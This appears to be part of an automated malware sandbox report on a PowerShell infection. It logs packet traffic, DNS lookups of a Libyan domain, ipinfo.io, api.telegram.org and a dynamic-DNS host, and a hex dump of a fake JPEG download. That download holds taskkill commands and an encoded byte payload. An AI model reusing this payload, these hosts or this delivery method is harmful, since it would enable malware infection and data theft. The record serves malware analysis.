                                                                                                        Nov 25, 2024 15:22:25.345304966 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.353686094 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.353800058 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.360660076 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.360775948 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.365921021 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.366024971 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.371409893 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.371512890 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.377526045 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.377638102 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.382872105 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.382977962 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.390072107 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.390223026 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.395275116 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.395473957 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.406847954 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.406970978 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.506750107 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.506874084 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.513165951 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.513264894 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.518439054 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.518552065 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.524148941 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.524267912 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.528070927 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.528156996 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.532354116 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.532444000 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.532463074 CET44349705168.119.208.219192.168.2.8
                                                                                                        Nov 25, 2024 15:22:25.532502890 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:25.535235882 CET49705443192.168.2.8168.119.208.219
                                                                                                        Nov 25, 2024 15:22:44.041920900 CET49709443192.168.2.834.117.59.81
                                                                                                        Nov 25, 2024 15:22:44.041954041 CET4434970934.117.59.81192.168.2.8
                                                                                                        Nov 25, 2024 15:22:44.042227030 CET49709443192.168.2.834.117.59.81
                                                                                                        Nov 25, 2024 15:22:44.049438000 CET49709443192.168.2.834.117.59.81
                                                                                                        Nov 25, 2024 15:22:44.049460888 CET4434970934.117.59.81192.168.2.8
                                                                                                        Nov 25, 2024 15:22:45.268868923 CET4434970934.117.59.81192.168.2.8
                                                                                                        Nov 25, 2024 15:22:45.268953085 CET49709443192.168.2.834.117.59.81
                                                                                                        Nov 25, 2024 15:22:45.272442102 CET49709443192.168.2.834.117.59.81
                                                                                                        Nov 25, 2024 15:22:45.272480011 CET4434970934.117.59.81192.168.2.8
                                                                                                        Nov 25, 2024 15:22:45.272744894 CET4434970934.117.59.81192.168.2.8
                                                                                                        Nov 25, 2024 15:22:45.278354883 CET49709443192.168.2.834.117.59.81
                                                                                                        Nov 25, 2024 15:22:45.319340944 CET4434970934.117.59.81192.168.2.8
                                                                                                        Nov 25, 2024 15:22:45.727421999 CET4434970934.117.59.81192.168.2.8
                                                                                                        Nov 25, 2024 15:22:45.727493048 CET4434970934.117.59.81192.168.2.8
                                                                                                        Nov 25, 2024 15:22:45.727565050 CET49709443192.168.2.834.117.59.81
                                                                                                        Nov 25, 2024 15:22:45.729748964 CET49709443192.168.2.834.117.59.81
                                                                                                        Nov 25, 2024 15:22:46.546374083 CET49710443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:46.546466112 CET44349710149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:46.546551943 CET49710443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:46.546999931 CET49710443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:46.547033072 CET44349710149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:47.967592001 CET44349710149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:47.967678070 CET49710443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:47.969300985 CET49710443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:47.969331026 CET44349710149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:47.969655991 CET44349710149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:47.970659971 CET49710443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:48.011343002 CET44349710149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:48.011410952 CET49710443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:48.011423111 CET44349710149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:48.628102064 CET44349710149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:48.628185987 CET44349710149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:48.628256083 CET49710443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:48.628770113 CET49710443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:48.878149986 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:48.878180027 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:48.878246069 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:48.904439926 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:48.904452085 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:49.554106951 CET497126161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:22:49.674177885 CET616149712178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:22:49.674407005 CET497126161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:22:49.686116934 CET497126161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:22:49.809386015 CET616149712178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.318586111 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.319698095 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.319729090 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.319842100 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.319864988 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.319994926 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320015907 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320138931 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320158005 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320271969 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320300102 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320425987 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320458889 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320539951 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320549965 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320688963 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320719004 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320738077 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320738077 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320750952 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320760965 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320768118 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320774078 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320835114 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320848942 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320878983 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320897102 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320909977 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320916891 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.320938110 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.320947886 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321069002 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321108103 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321129084 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321129084 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321145058 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321152925 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321181059 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321193933 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321238041 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321238041 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321258068 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321264982 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321311951 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321311951 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321337938 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321346045 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321357012 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321357012 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321369886 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321377039 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:50.321396112 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:50.321409941 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:52.995995998 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:52.996113062 CET44349711149.154.167.220192.168.2.8
                                                                                                        Nov 25, 2024 15:22:52.996373892 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:22:52.999639988 CET49711443192.168.2.8149.154.167.220
                                                                                                        Nov 25, 2024 15:23:11.597398996 CET616149712178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:23:11.597497940 CET497126161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:16.628904104 CET497126161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:16.630218029 CET497146161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:16.750276089 CET616149712178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:23:16.750838995 CET616149714178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:23:16.751199007 CET497146161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:16.751451969 CET497146161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:16.871429920 CET616149714178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:23:38.738218069 CET616149714178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:23:38.738289118 CET497146161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:43.845613003 CET497146161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:43.846872091 CET497176161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:43.966981888 CET616149714178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:23:43.967924118 CET616149717178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:23:43.968054056 CET497176161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:43.968529940 CET497176161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:23:44.090171099 CET616149717178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:23:49.033512115 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:23:49.154038906 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:23:49.154242992 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:24:05.926395893 CET616149717178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:05.928198099 CET497176161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:10.939218998 CET497176161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:10.940041065 CET497186161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:11.063386917 CET616149717178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:11.063543081 CET616149718178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:11.063910007 CET497186161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:11.064466000 CET497186161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:11.184423923 CET616149718178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:33.011812925 CET616149718178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:33.011899948 CET497186161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.017643929 CET497186161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.019021988 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.138328075 CET616149718178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:38.139522076 CET616149719178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:38.139651060 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.140114069 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.262214899 CET616149719178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:00.114622116 CET616149719178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:00.114720106 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.126965046 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.249360085 CET616149719178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:05.507419109 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.825428009 CET616149720178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:05.825526953 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.825938940 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.946125031 CET616149720178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:27.755732059 CET616149720178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:27.755795002 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:32.773791075 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:32.774642944 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:32.894442081 CET616149720178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:32.894782066 CET616149721178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:32.894979954 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:32.895472050 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:33.017524958 CET616149721178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:54.819591045 CET616149721178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:54.819859982 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:59.830066919 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:59.831240892 CET497226161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:59.954807043 CET616149721178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:59.955987930 CET616149722178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:59.956235886 CET497226161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:59.956516027 CET497226161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:26:00.076596022 CET616149722178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:26:21.929388046 CET616149722178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:26:21.929488897 CET497226161192.168.2.8178.208.169.197

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 25, 2024 15:22:16.223692894 CET5172553192.168.2.81.1.1.1
                                                                                                        Nov 25, 2024 15:22:16.865111113 CET53517251.1.1.1192.168.2.8
                                                                                                        Nov 25, 2024 15:22:43.893712997 CET6197253192.168.2.81.1.1.1
                                                                                                        Nov 25, 2024 15:22:44.031040907 CET53619721.1.1.1192.168.2.8
                                                                                                        Nov 25, 2024 15:22:46.407434940 CET5407753192.168.2.81.1.1.1
                                                                                                        Nov 25, 2024 15:22:46.545154095 CET53540771.1.1.1192.168.2.8
                                                                                                        Nov 25, 2024 15:22:49.222029924 CET6352153192.168.2.81.1.1.1
                                                                                                        Nov 25, 2024 15:22:49.549777031 CET53635211.1.1.1192.168.2.8
                                                                                                        Nov 25, 2024 15:25:05.127613068 CET6373853192.168.2.81.1.1.1
                                                                                                        Nov 25, 2024 15:25:05.506541967 CET53637381.1.1.1192.168.2.8

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Nov 25, 2024 15:22:16.223692894 CET192.168.2.81.1.1.10xe6a3Standard query (0)almamas.com.lyA (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:22:43.893712997 CET192.168.2.81.1.1.10xcfa8Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:22:46.407434940 CET192.168.2.81.1.1.10x9e57Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:22:49.222029924 CET192.168.2.81.1.1.10x6ee9Standard query (0)ducksex.ddnsfree.comA (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:25:05.127613068 CET192.168.2.81.1.1.10x54feStandard query (0)ducksex.ddnsfree.comA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Nov 25, 2024 15:22:16.865111113 CET1.1.1.1192.168.2.80xe6a3No error (0)almamas.com.ly168.119.208.219A (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:22:31.421943903 CET1.1.1.1192.168.2.80xf033No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:22:31.421943903 CET1.1.1.1192.168.2.80xf033No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:22:44.031040907 CET1.1.1.1192.168.2.80xcfa8No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:22:46.545154095 CET1.1.1.1192.168.2.80x9e57No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:22:49.549777031 CET1.1.1.1192.168.2.80x6ee9No error (0)ducksex.ddnsfree.com178.208.169.197A (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:23:33.540409088 CET1.1.1.1192.168.2.80x8125No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:23:33.540409088 CET1.1.1.1192.168.2.80x8125No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:23:36.218230009 CET1.1.1.1192.168.2.80xa56eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:23:36.218230009 CET1.1.1.1192.168.2.80xa56eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                        Nov 25, 2024 15:25:05.506541967 CET1.1.1.1192.168.2.80x54feNo error (0)ducksex.ddnsfree.com178.208.169.197A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • almamas.com.ly
                                                                                                        • ipinfo.io
                                                                                                        • api.telegram.org

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.849705168.119.208.2194432216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-25 14:22:24 UTC89OUTGET /wblwxiun.rtw/pnilrykd.jpg HTTP/1.1
                                                                                                        Host: almamas.com.ly
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-25 14:22:24 UTC209INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 25 Nov 2024 14:22:24 GMT
                                                                                                        Server: Apache
                                                                                                        Last-Modified: Mon, 18 Nov 2024 12:51:34 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 271030
                                                                                                        Connection: close
                                                                                                        Content-Type: image/jpeg
                                                                                                        2024-11-25 14:22:24 UTC7983INData Raw: 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 43 43 6c 65 61 6e 65 72 42 72 6f 77 73 65 72 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 61 73 70 6e 65 74 5f 72 65 67 62 72 6f 77 73 65 72 73 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 61 73 70 6e 65 74 5f 63 6f 6d 70 69 6c 65 72 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 41 70 70 4c 61 75 6e 63 68 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 49 6e 73 74 61 6c 6c 55 74 69 6c 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 6a 73 63 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 4d 53 42 75 69 6c 64 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 52 65 67 41 73 6d 2e 65 78 65 20 2f 46 0a 74 61 73
                                                                                                        Data Ascii: taskkill /IM CCleanerBrowser.exe /Ftaskkill /IM aspnet_regbrowsers.exe /Ftaskkill /IM aspnet_compiler.exe /Ftaskkill /IM AppLaunch.exe /Ftaskkill /IM InstallUtil.exe /Ftaskkill /IM jsc.exe /Ftaskkill /IM MSBuild.exe /Ftaskkill /IM RegAsm.exe /Ftas
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 30 2c 31 38 32 2c 32 35 34 2c 31 37 32 2c 34 30 2c 31 36 39 2c 33 35 2c 32 31 35 2c 31 36 37 2c 31 38 31 2c 32 30 33 2c 31 39 36 2c 32 34 34 2c 35 37 2c 32 31 37 2c 38 36 2c 31 35 36 2c 32 33 35 2c 32 31 36 2c 32 31 34 2c 37 31 2c 32 34 33 2c 32 31 38 2c 32 31 36 2c 32 31 34 2c 37 31 2c 32 34 32 2c 31 32 30 2c 31 39 35 2c 37 30 2c 31 35 30 2c 37 38 2c 39 36 2c 32 34 30 2c 31 32 37 2c 31 34 31 2c 38 36 2c 32 32 31 2c 38 35 2c 31 32 39 2c 31 37 39 2c 31 30 33 2c 36 32 2c 31 37 32 2c 31 31 32 2c 31 38 31 2c 32 32 37 2c 31 30 36 2c 31 31 30 2c 39 35 2c 33 37 2c 31 34 32 2c 37 35 2c 31 35 32 2c 31 30 32 2c 32 31 32 2c 31 35 35 2c 31 32 37 2c 31 36 37 2c 31 34 37 2c 39 37 2c 31 34 38 2c 37 30 2c 32 31 35 2c 31 30 36 2c 31 31 37 2c 39 30 2c 39 32 2c 31 31 35 2c
                                                                                                        Data Ascii: 0,182,254,172,40,169,35,215,167,181,203,196,244,57,217,86,156,235,216,214,71,243,218,216,214,71,242,120,195,70,150,78,96,240,127,141,86,221,85,129,179,103,62,172,112,181,227,106,110,95,37,142,75,152,102,212,155,127,167,147,97,148,70,215,106,117,90,92,115,
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 35 2c 32 33 39 2c 31 39 35 2c 31 35 31 2c 31 39 2c 31 39 34 2c 31 33 39 2c 31 30 39 2c 32 31 30 2c 36 30 2c 31 32 39 2c 31 33 35 2c 31 33 30 2c 31 30 36 2c 37 33 2c 32 31 39 2c 33 37 2c 32 33 37 2c 35 37 2c 32 33 33 2c 39 31 2c 32 31 38 2c 32 33 2c 32 31 31 2c 38 36 2c 37 32 2c 39 35 2c 31 36 30 2c 32 33 37 2c 31 39 39 2c 32 33 37 2c 31 33 39 2c 31 30 34 2c 35 39 2c 31 37 36 2c 35 38 2c 33 39 2c 31 32 35 2c 32 34 33 2c 32 33 34 2c 31 39 37 2c 31 38 30 2c 32 31 2c 32 31 30 2c 32 33 2c 31 30 34 2c 31 38 37 2c 31 30 33 2c 32 34 35 2c 33 34 2c 32 31 38 2c 31 34 36 2c 31 38 36 2c 31 35 36 2c 32 34 34 2c 31 32 31 2c 31 38 36 2c 31 39 37 2c 31 38 30 2c 32 31 2c 32 31 30 2c 31 31 2c 32 31 38 2c 39 30 2c 38 31 2c 32 31 39 2c 32 31 35 2c 31 31 36 2c 31 39 37 2c 32
                                                                                                        Data Ascii: 5,239,195,151,19,194,139,109,210,60,129,135,130,106,73,219,37,237,57,233,91,218,23,211,86,72,95,160,237,199,237,139,104,59,176,58,39,125,243,234,197,180,21,210,23,104,187,103,245,34,218,146,186,156,244,121,186,197,180,21,210,11,218,90,81,219,215,116,197,2
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 36 36 2c 32 33 38 2c 31 36 33 2c 37 36 2c 37 38 2c 39 39 2c 31 38 33 2c 35 2c 32 33 37 2c 31 32 30 2c 31 37 35 2c 32 38 2c 32 33 33 2c 32 33 30 2c 31 35 39 2c 36 31 2c 32 34 37 2c 31 37 30 2c 31 36 34 2c 31 35 30 2c 32 32 31 2c 31 36 35 2c 31 32 30 2c 31 36 30 2c 31 32 33 2c 33 39 2c 31 38 31 2c 31 39 35 2c 38 33 2c 31 34 37 2c 31 32 35 2c 31 36 39 2c 32 31 39 2c 31 39 39 2c 32 32 38 2c 34 2c 31 38 36 2c 31 33 2c 31 35 32 2c 32 32 35 2c 31 37 2c 31 35 34 2c 32 32 35 2c 32 33 33 2c 31 39 36 2c 32 31 33 2c 32 33 39 2c 32 36 2c 32 36 2c 31 30 34 2c 31 33 34 2c 31 35 38 2c 31 34 33 2c 32 35 35 2c 32 34 33 2c 31 38 31 2c 32 33 38 2c 31 37 39 2c 37 33 2c 31 34 32 2c 32 31 39 2c 31 32 35 2c 35 35 2c 32 32 2c 32 35 34 2c 31 31 37 2c 38 31 2c 31 37 33 2c 32 35 34
